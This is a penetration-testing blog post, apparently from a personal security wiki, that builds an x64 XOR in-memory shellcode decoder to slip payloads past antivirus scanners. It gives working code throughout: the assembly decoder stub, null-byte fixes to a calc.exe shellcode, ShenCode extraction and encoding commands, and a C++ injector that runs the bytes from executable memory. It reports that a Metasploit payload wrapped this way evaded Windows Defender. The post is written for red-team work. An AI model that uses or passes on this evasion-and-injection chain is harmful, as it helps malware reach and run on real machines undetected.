{{tag>IT-Security Windows Kali pentest obfuscation blog english}}

====== Obfuscation: polymorphic in-memory decoder ======

{{it-security:blog:2024-250_xor_in-memory_decoder.webp?400|}}

Red-teaming and penetration tests often require virus scanners to be bypassed in order to effectively detect security vulnerabilities. [[en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen|In the last part]] we looked at disguising shellcode as UUIDs in the source code. This worked well, but the shellcode was still recognised in memory and blocked.

We now want to solve this with a polymorphic in-memory decoder: a shellcode that decodes shellcode.

===== XOR decoder =====

I have taken the XOR decoder from [[https://www.doyler.net/security-not-included/shellcode-xor-encoder-decoder|doyler.net]] and adapted it to the x64 architecture. This was quite simple, as only the corresponding registers had to be renamed.

The decoder starts with this instruction:

<code asm>
_start:
    jmp short call_decoder      ; Begin of JMP-CALL-POP
</code>

''%%JMP-CALL-POP%%'' is a technique that makes the code position-independent: it finds its own data no matter where it is loaded in memory. In this first step, we jump to the label ''%%call_decoder%%''.

<code asm>
call_decoder:
    call decoder                ; CALL pushes the address of the following bytes (the shellcode) onto the stack
    ; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6...
</code>

Here we see that the ''%%CALL%%'' instruction directly calls another part of the programme. As soon as this happens, the return address, i.e. the address of the bytes following the ''%%CALL%%'' (in our case the shellcode), is pushed onto the stack, and ''%%RSP%%'' points to it.

<code asm>
decoder:
    pop rsi                     ; Move pointer to encoded shellcode into RSI from the stack
</code>

In the called part of the programme, we pop this pointer from the stack into the register ''%%RSI%%'' and now know where our shellcode is located in memory.
Now we move on to the actual decoding routine:

<code asm>
decode:
    xor byte [rsi], 0x3F        ; The byte RSI points to is XORed with 0x3F
    jz Shellcode                ; leave the loop if the result is 0: [RSI] xor 0x3F = 0
    inc rsi                     ; increment RSI to decode the next byte
    jmp short decode            ; loop until each byte was decoded
</code>

''%%xor byte [rsi], 0x3F%%'' decodes the byte that ''%%RSI%%'' points to. In the first pass, this is the first byte of the shellcode. The key for decoding is ''%%0x3F%%'' and must match the key that was used for encoding.

''%%jz Shellcode%%'' then checks whether the decoded byte equals ''%%0x00%%''.

==== $Byte \neq 0$ ====

If the decoded byte is not zero, execution continues with the next instruction:

''%%inc rsi%%''

''%%RSI%%'' is incremented and thus points to the next byte in the shellcode, which is decoded during the next pass.

''%%jmp short decode%%'' jumps back to the beginning of the loop.

==== $Byte = 0$ ====

If the decoded byte is zero, the loop ends and the shellcode is executed. It is important to append the key to the shellcode here, because:

''%%0x3F XOR 0x3F = 0x00%%''

This marks the end of the shellcode and ends the loop. We therefore do not need an additional counter.

''%%jz Shellcode%%'' now jumps directly to our decoded shellcode and executes it.

===== calc.exe Payload =====

We want to execute the ''%%calc.exe%%'' payload from [[en:it-security:blog:shellcode_injection-4|this blog post]]. However, it still contains 0 bytes, which prevent decoding. Why is this the case? Here is an example:

<code>
# Encoding
XOR Key: 0x3F
Byte: 0x00

0x00 XOR 0x3F = 0x3F

# Decoding
XOR Key: 0x3F
Byte: 0x3F

0x3F XOR 0x3F = 0x00
</code>

A 0 byte in the payload would thus abort the decoding process early, since ''%%jz Shellcode%%'' would treat it as the signal to terminate. We therefore need to make a few modifications.

==== GS Register ====

The fix for the GS register from the previous post removes only two of the three 0 bytes.
This was sufficient for the previous tests. A small change brings us to our goal here:

<code asm [enable_line_numbers="true",start_line_numbers_at="26"]>
xor rax, rax
mov al, 60h
mov rax, gs:[rax]         ; 65 48 8b 00
</code>

change to:

<code asm [enable_line_numbers="true",start_line_numbers_at="26"]>
xor rax, rax
mov rax, gs:[rax+0x60]    ; 65 48 8b 40 60
</code>

This also reduces the size of our shellcode a little.

==== Kernel32-Base ====

When searching for ''%%Kernel32Base%%'' we dereference the register ''%%RAX%%'' directly, without a displacement. This encoding also contains a 0 byte. Here, however, we can use the register ''%%RBX%%'' as an intermediate and thus avoid the 0 bytes.

<code asm [enable_line_numbers="true",start_line_numbers_at="30"]>
mov rax, [rax]    ; 48 8b 00
mov rax, [rax]    ; 48 8b 00
</code>

change to:

<code asm [enable_line_numbers="true",start_line_numbers_at="30"]>
mov rbx, [rax]    ; 48 8b 18
mov rax, [rbx]    ; 48 8b 03
</code>

==== JMP SHORT ====

<code asm [enable_line_numbers="true",start_line_numbers_at="76"]>
jmp short InvokeWinExec    ; eb 00
</code>

Here the code jumps to the next instruction. Execution reaches that instruction without the ''%%JMP%%'' anyway, so we can comment out the line.

==== Compile ====

We can now assemble the code and get opcodes without 0 bytes.

<code batch>
nasm -f win64 calc.asm -o calc.o
</code>

===== XOR decoder stub =====

==== Prepare calc.exe payload ====

We now need to edit the opcodes a little in order to be able to use them in the decoder. I use my shellcode tool [[https://github.com/psycore8/shencode|ShenCode]] for this:

<code python>
python shencode.py extract -f calc.o -o calc.raw -fb 60 -lb 311
...
python shencode.py encode -f calc.raw -o calc.xor -x -xk 63
...
python shencode.py output -f calc.xor -s cs
[*] processing shellcode format...
0x6a,0x77,0xb6, ... 0x07,0x77,0xbc,0xfb,0x27,0x77,0xbc,0xfb,0x37,0x62
[+] DONE!
</code>

Step by step:

  - We extract the actual shellcode from the file ''%%calc.o%%'' and save it in ''%%calc.raw%%'' (from offset ''%%60%%'' to ''%%311%%'')
  - We encode the extracted code with the key ''%%63%%'' and save the result in ''%%calc.xor%%''; decimal ''%%63%%'' corresponds to hexadecimal ''%%3F%%''
  - We output the encoded shellcode in C# format (which we can also use for assembler)

We save the output, remove the line breaks and append our "magic byte" ''%%0x3F%%'' at the end.

==== XOR decoder and payload ====

Now we can add our payload to the XOR decoder. To do this, we copy the previously prepared bytes into the last instruction of the XOR decoder:

<code asm>
    ; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6,...0x37,0x62,0x3f
</code>

We also check whether the XOR key matches:

<code asm>
decode:
    xor byte [rsi], 0x3F
</code>

If everything is correct, we assemble our decoder:

<code batch>
nasm -f win64 xor-decoder.asm -o xor-decoder.o
</code>

We then look up the shellcode offsets, extract our code and prepare it for our ''%%Inject.cpp%%'' file:

<code python>
python shencode.py output -f xor-decoder.o -s inspect
0x00000048: 00 00 00 00 00 00 00 00
0x00000056: 20 00 50 60 eb 0b 5e 80    Offset=60
0x00000064: 36 3f 74 0a 48 ff c6 eb
...
0x00000320: bc fb 27 77 bc fb 37 62
0x00000328: 3f 2e 66 69 6c 65 00 00    Offset=329
0x00000336: 00 00 00 00 00 fe ff 00

python shencode.py extract -f xor-decoder.o -o xor-decoder.stub -fb 60 -lb 329
[*] try to open file
[+] reading xor-decoder.o successful!
[*] cutting shellcode from 60 to 329
[+] written shellcode to xor-decoder.stub
[+] DONE!

python shencode.py output -f xor-decoder.stub -s c
[*] processing shellcode format...
"\xeb\x0b\x5e...\x37\x62\x3f"";
[+] DONE!
</code>

===== Inject.cpp =====

We can now insert the bytes we have just prepared into our injector programme and compile it.
<code cpp>
#include <stdio.h>
#include <windows.h>
#include <iostream>

#pragma warning

unsigned char payload[] = "\xeb\x0b\x5e...\x37\x62\x3f";

int main() {
    size_t byteArrayLength = sizeof(payload);
    std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl;

    void* (*memcpyPtr) (void*, const void*, size_t);

    // Allocate a memory region that is readable, writable and executable
    void* exec = VirtualAlloc(0, byteArrayLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    // Copy the decoder stub together with the encoded payload into that region
    memcpyPtr = &memcpy;
    memcpyPtr(exec, payload, byteArrayLength);

    // Call the copied bytes as a function
    ((void(*)())exec)();
    return 0;
}
</code>

===== Debug =====

For testing purposes, I started a debugger and navigated to the memory area of the XOR decoder. While stepping through the code, you can see how the instructions in the lower area are decoded one by one. In the images, this is visible below the ''%%call%%'' instruction (the area that corresponds to ''%%Shellcode: db ...%%'').

{{it-security:blog:2024-250_xor_in-memory_decoder.png?600|}}

{{it-security:blog:2024-250_xor_in-memory_decoder_1.png?600|}}

{{it-security:blog:2024-250_xor_in-memory_decoder_2.png?600|}}

{{it-security:blog:2024-250-animation.gif|}}

The animation above shows the decoding loop running while the shellcode in the lower area is decoded step by step.

===== Test with a Metasploit payload =====

The whole thing also works with a Metasploit payload:

{{it-security:blog:2024-250_xor_in-memory_decoder_3.png?700|}}

===== Conclusion =====

To simplify the process, I have integrated the XOR stub as a template in [[https://github.com/psycore8/shencode|ShenCode]]. With two commands, we generate an XOR in-memory decoder:

<code python>
python shencode.py encode -f input.raw -o xor.out --xor --xorkey 63
python shencode.py create --xor-stub --xor-filename xor.out --xor-outputfile stub.raw --xor-key 63
</code>

The XOR decoder keeps the payload encoded in memory until it is decoded at runtime. In combination with other obfuscation techniques, this can be a useful aid for penetration tests. During my test, even the Metasploit payload was not detected by Windows Defender.
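==== Sketch: the terminator logic in Python ====

The terminator logic of the decoder loop can also be reproduced outside of assembler. The following is only a minimal sketch on harmless toy bytes and is not part of ShenCode; the function names ''%%xor_encode%%'' and ''%%decode_until_zero%%'' as well as the sample bytes are assumptions made for this illustration. It shows why the appended key ends the loop and why a 0 byte in the unencoded data would end it too early.

<code python>
KEY = 0x3F  # same key as in the article (decimal 63)


def xor_encode(data: bytes, key: int) -> bytes:
    """XOR every byte with the key and append the key itself as end marker."""
    return bytes(b ^ key for b in data) + bytes([key])


def decode_until_zero(encoded: bytes, key: int) -> bytes:
    """Mimic the decode loop: XOR byte by byte, stop at the first 0x00 result."""
    decoded = bytearray()
    for b in encoded:
        value = b ^ key
        if value == 0:      # corresponds to the jz branch
            break
        decoded.append(value)
    return bytes(decoded)


# Toy data without 0 bytes: the round trip restores the input completely.
clean = bytes([0x11, 0x22, 0x33, 0x44])
assert decode_until_zero(xor_encode(clean, KEY), KEY) == clean

# Toy data with a 0 byte: decoding stops right before it.
with_zero = bytes([0x11, 0x00, 0x33, 0x44])
assert decode_until_zero(xor_encode(with_zero, KEY), KEY) == bytes([0x11])
</code>

A check such as ''%%0 in data%%'' before encoding is therefore a cheap way to notice input that this single-byte scheme cannot handle.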
~~DISCUSSION~~